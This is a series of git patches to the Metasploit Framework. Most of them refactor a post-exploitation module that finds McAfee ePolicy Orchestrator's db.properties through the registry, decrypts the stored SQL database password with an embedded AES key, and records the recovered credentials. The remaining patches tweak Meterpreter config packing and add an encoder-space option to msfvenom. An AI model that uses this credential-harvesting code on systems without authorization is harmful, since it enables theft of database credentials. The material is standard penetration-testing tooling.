From 2721be946a741f47c797cf63c7ac5a099edd427a Mon Sep 17 00:00:00 2001 From: "Donny Maasland (Fox-IT)" Date: Fri, 15 May 2015 14:28:12 +0200 Subject: [PATCH 1/8] also check Wow6432Node keys --- .../windows/gather/credentials/epo_sql.rb | 37 ++++++++++++++----- 1 file changed, 27 insertions(+), 10 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index dbafe20150..a4fe21df56 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -31,20 +31,37 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed print_status("Finding Tomcat install path...") - subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator") - if subkeys.nil? or subkeys.empty? + + # Check both normal and Wow6432Node keys + subkeys = + [ + 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator', + 'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator' + ] + + epol_reg_keys = [] + subkeys.each do |subkey| + key = registry_enumkeys(subkey) + if not key.nil? + epol_reg_keys.push(subkey) + end + end + + if (epol_reg_keys.nil? or epol_reg_keys.empty?) print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") return end + # Get the db.properties file location - epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" - dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") - if dbprops_file == nil or dbprops_file == "" - print_error("Could not find db.properties file location") - else - dbprops_file << "/conf/orion/db.properties"; - print_good("Found db.properties location"); - process_config(dbprops_file); + epol_reg_keys.each do |epol_reg_key| + dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") + if dbprops_file == nil or dbprops_file == "" + print_error("Could not find db.properties file location") + else + dbprops_file << "/conf/orion/db.properties"; + print_good("Found db.properties location"); + process_config(dbprops_file); + end end end From dbe4f3f1c849c2c95281e5565120ec4d1c16149c Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 18 May 2015 09:26:47 +1000 Subject: [PATCH 2/8] Adjust single pack statement, fix up some quotes * Moved over to using single quotes for strings that don't need escaping or interpolation. * Changed one pack spec to be "more correct". Thankfully, we were only packing 0 so the endianness isn't a problem, however it should be correct, hence the fix. --- lib/rex/payloads/meterpreter/config.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb index a06a19ebca..74a306edb9 100644 --- a/lib/rex/payloads/meterpreter/config.rb +++ b/lib/rex/payloads/meterpreter/config.rb @@ -39,7 +39,7 @@ private end def to_wchar_t(item, size) - to_ascii(item, size).unpack("C*").pack("v*") + to_ascii(item, size).unpack('C*').pack('v*') end def to_ascii(item, size) @@ -57,7 +57,7 @@ private uuid # the UUID ] - session_data.pack("VVVA*") + session_data.pack('VVVA*') end def transport_block(opts) @@ -117,7 +117,7 @@ private ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}", file_extension)) - extension_data = [ ext.length, ext ].pack("VA*") + extension_data = [ ext.length, ext ].pack('VA*') end def config_block @@ -143,9 +143,9 @@ private # terminate the extensions with a 0 size if is_x86? - config << [0].pack("V") + config << [0].pack('V') else - config << [0].pack("Q") + config << [0].pack('Q<') end # and we're done From 30f7c651c9dc753356fa66673131dd4b18ae65c0 Mon Sep 17 00:00:00 2001 From: "Donny Maasland (Fox-IT)" Date: Mon, 18 May 2015 10:19:32 +0200 Subject: [PATCH 3/8] use REGISTRY_VIEW_32_BIT --- .../windows/gather/credentials/epo_sql.rb | 39 ++++++------------- 1 file changed, 11 insertions(+), 28 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index a4fe21df56..7140a6a823 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -31,37 +31,20 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed print_status("Finding Tomcat install path...") - - # Check both normal and Wow6432Node keys - subkeys = - [ - 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator', - 'HKLM\\Software\\Wow6432Node\\Network Associates\\ePolicy Orchestrator' - ] - - epol_reg_keys = [] - subkeys.each do |subkey| - key = registry_enumkeys(subkey) - if not key.nil? - epol_reg_keys.push(subkey) - end - end - - if (epol_reg_keys.nil? or epol_reg_keys.empty?) + subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT) + if subkeys.nil? or subkeys.empty? print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") return end - # Get the db.properties file location - epol_reg_keys.each do |epol_reg_key| - dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder") - if dbprops_file == nil or dbprops_file == "" - print_error("Could not find db.properties file location") - else - dbprops_file << "/conf/orion/db.properties"; - print_good("Found db.properties location"); - process_config(dbprops_file); - end + epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" + dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT) + if dbprops_file == nil or dbprops_file == "" + print_error("Could not find db.properties file location") + else + dbprops_file << "/conf/orion/db.properties"; + print_good("Found db.properties location"); + process_config(dbprops_file); end end @@ -191,4 +174,4 @@ class Metasploit3 < Msf::Post end -end +end \ No newline at end of file From 7d650954725f7b651510532ed96f79cbefa54293 Mon Sep 17 00:00:00 2001 From: "Donny Maasland (Fox-IT)" Date: Mon, 18 May 2015 12:20:42 +0200 Subject: [PATCH 4/8] fix quotes --- .../windows/gather/credentials/epo_sql.rb | 82 +++++++++---------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 7140a6a823..4c7a3cf4ec 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -5,7 +5,7 @@ require 'msf/core' require 'rex' -require "net/dns/resolver" +require 'net/dns/resolver' require 'msf/core/auxiliary/report' class Metasploit3 < Msf::Post @@ -30,20 +30,20 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed - print_status("Finding Tomcat install path...") - subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator",REGISTRY_VIEW_32_BIT) + print_status('Finding Tomcat install path...') + subkeys = registry_enumkeys('HKLM\\Software\\Network Associates\\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT) if subkeys.nil? or subkeys.empty? - print_error ("ePO 4.6 Not Installed or No Permissions to RegKey") + print_error ('ePO 4.6 Not Installed or No Permissions to RegKey') return end # Get the db.properties file location - epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator" - dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder",REGISTRY_VIEW_32_BIT) - if dbprops_file == nil or dbprops_file == "" - print_error("Could not find db.properties file location") + epol_reg_key = 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator' + dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT) + if dbprops_file == nil or dbprops_file == '' + print_error('Could not find db.properties file location') else - dbprops_file << "/conf/orion/db.properties"; - print_good("Found db.properties location"); + dbprops_file << '/conf/orion/db.properties'; + print_good('Found db.properties location'); process_config(dbprops_file); end end @@ -57,39 +57,39 @@ class Metasploit3 < Msf::Post line.chomp line_array = line.split('=') case line_array[0] - when "db.database.name" - database_name = "" + when 'db.database.name' + database_name = '' line_array[1].each_byte { |x| database_name << x unless x > 126 || x < 32 } - when "db.instance.name" - database_instance = "" + when 'db.instance.name' + database_instance = '' line_array[1].each_byte { |x| database_instance << x unless x > 126 || x < 32 } - when "db.user.domain" - user_domain = "" + when 'db.user.domain' + user_domain = '' line_array[1].each_byte { |x| user_domain << x unless x > 126 || x < 32 } - when "db.user.name" - user_name = "" + when 'db.user.name' + user_name = '' line_array[1].each_byte { |x| user_name << x unless x > 126 || x < 32 } - when "db.port" - port = "" + when 'db.port' + port = '' line_array[1].each_byte { |x| port << x unless x > 126 || x < 32 } - when "db.user.passwd.encrypted.ex" + when 'db.user.passwd.encrypted.ex' # ePO 4.6 encrypted password - passwd = "" + passwd = '' line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } - passwd.gsub("\\","") + passwd.gsub('\\','') # Add any Base64 padding that may have been stripped out - passwd << "=" until ( passwd.length % 4 == 0 ) + passwd << '=' until ( passwd.length % 4 == 0 ) plaintext_passwd = decrypt46(passwd) - when "db.user.passwd.encrypted" + when 'db.user.passwd.encrypted' # ePO 4.5 encrypted password - not currently supported, see notes below - passwd = "" + passwd = '' line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 } - passwd.gsub("\\","") + passwd.gsub('\\','') # Add any Base64 padding that may have been stripped out - passwd << "=" until ( passwd.length % 4 == 0 ) - plaintext_passwd = "PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP" - when "db.server.name" - database_server_name = "" + passwd << '=' until ( passwd.length % 4 == 0 ) + plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP' + when 'db.server.name' + database_server_name = '' line_array[1].each_byte { |x| database_server_name << x unless x > 126 || x < 32 } end end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post result = client.net.resolve.resolve_host(database_server_name) if result[:ip].nil? or result[:ip].empty? - print_error("Could not determine IP of DB - credentials not added to report database") + print_error('Could not determine IP of DB - credentials not added to report database') return end @@ -111,11 +111,11 @@ class Metasploit3 < Msf::Post print_good("Database IP: #{db_ip}") end print_good("Port: #{port}") - if user_domain == nil or user_domain == "" - print_good("Authentication Type: SQL"); + if user_domain == nil or user_domain == '' + print_good('Authentication Type: SQL'); full_user = user_name else - print_good("Authentication Type: Domain"); + print_good('Authentication Type: Domain'); print_good("Domain: #{user_domain}"); full_user = "#{user_domain}\\#{user_name}" end @@ -127,8 +127,8 @@ class Metasploit3 < Msf::Post service_data = { address: Rex::Socket.getaddress(db_ip), port: port, - protocol: "tcp", - service_name: "mssql", + protocol: 'tcp', + service_name: 'mssql', workspace_id: myworkspace_id } @@ -145,21 +145,21 @@ class Metasploit3 < Msf::Post login_data = { core: credential_core, - access_level: "User", + access_level: 'User', status: Metasploit::Model::Login::Status::UNTRIED } create_credential_login(login_data.merge(service_data)) - print_good("Added credentials to report database") + print_good('Added credentials to report database') else - print_error("Could not determine IP of DB - credentials not added to report database") + print_error('Could not determine IP of DB - credentials not added to report database') end end def decrypt46(encoded) encrypted_data = Rex::Text.decode_base64(encoded) - aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB") + aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB') aes.padding = 0 aes.decrypt # Private key extracted from ePO 4.6.0 Build 1029 From e1eed6e9d9566bf7e2fe04743c377a436e80c8fe Mon Sep 17 00:00:00 2001 From: "Donny Maasland (Fox-IT)" Date: Mon, 18 May 2015 16:33:57 +0200 Subject: [PATCH 5/8] single quotes and slashes.. --- modules/post/windows/gather/credentials/epo_sql.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 4c7a3cf4ec..9e12f75297 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -31,13 +31,13 @@ class Metasploit3 < Msf::Post def run # Find out where things are installed print_status('Finding Tomcat install path...') - subkeys = registry_enumkeys('HKLM\\Software\\Network Associates\\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT) + subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT) if subkeys.nil? or subkeys.empty? print_error ('ePO 4.6 Not Installed or No Permissions to RegKey') return end # Get the db.properties file location - epol_reg_key = 'HKLM\\Software\\Network Associates\\ePolicy Orchestrator' + epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator' dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT) if dbprops_file == nil or dbprops_file == '' print_error('Could not find db.properties file location') From a82168d7bb89a257dd40f21e0b9d896fa4f4d7b1 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Mon, 18 May 2015 14:27:52 -0500 Subject: [PATCH 6/8] Fixes #5361 by adding --encoder-space to msfvenom --- lib/msf/core/payload_generator.rb | 9 +++++++-- msfvenom | 4 ++++ 2 files changed, 11 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 4bc6c1fe7c..b7feb2ffee 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -64,6 +64,9 @@ module Msf # @!attribute space # @return [Fixnum] The maximum size in bytes of the payload attr_accessor :space + # @!attribute encoder_space + # @return [Fixnum] The maximum size in bytes of the encoded payload + attr_accessor :encoder_space # @!attribute stdin # @return [String] The raw bytes of a payload taken from STDIN attr_accessor :stdin @@ -85,6 +88,7 @@ module Msf # @option opts [String] :badchars (see #badchars) # @option opts [String] :template (see #template) # @option opts [Fixnum] :space (see #space) + # @option opts [Fixnum] :encoder_space (see #encoder_space) # @option opts [Fixnum] :nops (see #nops) # @option opts [String] :add_code (see #add_code) # @option opts [Boolean] :keep (see #keep) @@ -109,6 +113,7 @@ module Msf @stdin = opts.fetch(:stdin, nil) @template = opts.fetch(:template, '') @var_name = opts.fetch(:var_name, 'buf') + @encoder_space = opts.fetch(:encoder_space, @space) @framework = opts.fetch(:framework) @@ -200,7 +205,7 @@ module Msf encoder_list.each do |encoder_mod| cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}" begin - encoder_mod.available_space = @space + encoder_mod.available_space = @encoder_space return run_encoder(encoder_mod, shellcode.dup) rescue ::Msf::EncoderSpaceViolation => e cli_print "#{encoder_mod.refname} failed with #{e.message}" @@ -395,7 +400,7 @@ module Msf iterations.times do |x| shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list) cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})" - if shellcode.length > space + if shellcode.length > encoder_space raise EncoderSpaceViolation, "encoder has made a buffer that is too big" end end diff --git a/msfvenom b/msfvenom index bc28223e5b..01b93a016c 100755 --- a/msfvenom +++ b/msfvenom @@ -97,6 +97,10 @@ require 'msf/core/payload_generator' opts[:space] = s end + opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opts[:encoder_space] = s + end + opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| opts[:badchars] = Rex::Text.hex_to_raw(b) end From 79db696c15d859b21b5c65f0b2383f508a1230e3 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 18 May 2015 15:46:55 -0500 Subject: [PATCH 7/8] fix EOL character --- modules/post/windows/gather/credentials/epo_sql.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/epo_sql.rb b/modules/post/windows/gather/credentials/epo_sql.rb index 9e12f75297..7abf8eb39a 100644 --- a/modules/post/windows/gather/credentials/epo_sql.rb +++ b/modules/post/windows/gather/credentials/epo_sql.rb @@ -172,6 +172,5 @@ class Metasploit3 < Msf::Post password.gsub!(/[^[:print:]]/,'') return password end +end - -end \ No newline at end of file From fb43ef4494b2b2a0f33687f19920519ff26146d7 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 18 May 2015 16:39:52 -0500 Subject: [PATCH 8/8] realign msfvenom help text --- msfvenom | 57 ++++++++++++++++++++++++++++---------------------------- 1 file changed, 29 insertions(+), 28 deletions(-) diff --git a/msfvenom b/msfvenom index 01b93a016c..e1662539e8 100755 --- a/msfvenom +++ b/msfvenom @@ -58,7 +58,8 @@ require 'msf/core/payload_generator' opt.separator('') opt.separator('Options:') - opt.on('-p', '--payload ', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| + opt.on('-p', '--payload ', String, + 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p| if p == '-' opts[:payload] = 'stdin' else @@ -66,54 +67,67 @@ require 'msf/core/payload_generator' end end - opt.on('-l', '--list [module_type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| + opt.on('--payload-options', "List the payload's standard options") do + opts[:list_options] = true + end + + opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l| if l.nil? or l.empty? l = ["all"] end opts[:list] = l end - opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| + opt.on('-n', '--nopsled ', Integer, 'Prepend a nopsled of [length] size on to the payload') do |n| opts[:nops] = n.to_i end - opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| + opt.on('-f', '--format ', String, "Output format (use --help-formats for a list)") do |f| opts[:format] = f end - opt.on('-e', '--encoder [encoder]', String, 'The encoder to use') do |e| + opt.on('--help-formats', String, "List available formats") do + init_framework(:module_types => []) + msg = "Executable formats\n" + + "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + + "Transform formats\n" + + "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") + raise UsageError, msg + end + + opt.on('-e', '--encoder ', String, 'The encoder to use') do |e| opts[:encoder] = e end - opt.on('-a', '--arch ', String, 'The architecture to use') do |a| + opt.on('-a', '--arch ', String, 'The architecture to use') do |a| opts[:arch] = a end - opt.on('--platform ', String, 'The platform of the payload') do |l| + opt.on('--platform ', String, 'The platform of the payload') do |l| opts[:platform] = l end - opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| + opt.on('-s', '--space ', Integer, 'The maximum size of the resulting payload') do |s| opts[:space] = s end - opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| + opt.on('--encoder-space ', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s| opts[:encoder_space] = s end - opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| + opt.on('-b', '--bad-chars ', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b| opts[:badchars] = Rex::Text.hex_to_raw(b) end - opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| + opt.on('-i', '--iterations ', Integer, 'The number of times to encode the payload') do |i| opts[:iterations] = i end - opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| + opt.on('-c', '--add-code ', String, 'Specify an additional win32 shellcode file to include') do |x| opts[:add_code] = x end - opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| + opt.on('-x', '--template ', String, 'Specify a custom executable file to use as a template') do |x| opts[:template] = x end @@ -121,15 +135,11 @@ require 'msf/core/payload_generator' opts[:keep] = true end - opt.on('--payload-options', "List the payload's standard options") do - opts[:list_options] = true - end - - opt.on('-o', '--out ', 'Save the payload') do |x| + opt.on('-o', '--out ', 'Save the payload') do |x| opts[:out] = x end - opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| + opt.on('-v', '--var-name ', String, 'Specify a custom variable name to use for certain output formats') do |x| opts[:var_name] = x end @@ -137,15 +147,6 @@ require 'msf/core/payload_generator' raise UsageError, "#{opt}" end - opt.on_tail('--help-formats', String, "List available formats") do - init_framework(:module_types => []) - msg = "Executable formats\n" + - "\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" + - "Transform formats\n" + - "\t" + ::Msf::Simple::Buffer.transform_formats.join(", ") - raise UsageError, msg - end - begin opt.parse!(args) rescue OptionParser::InvalidOption => e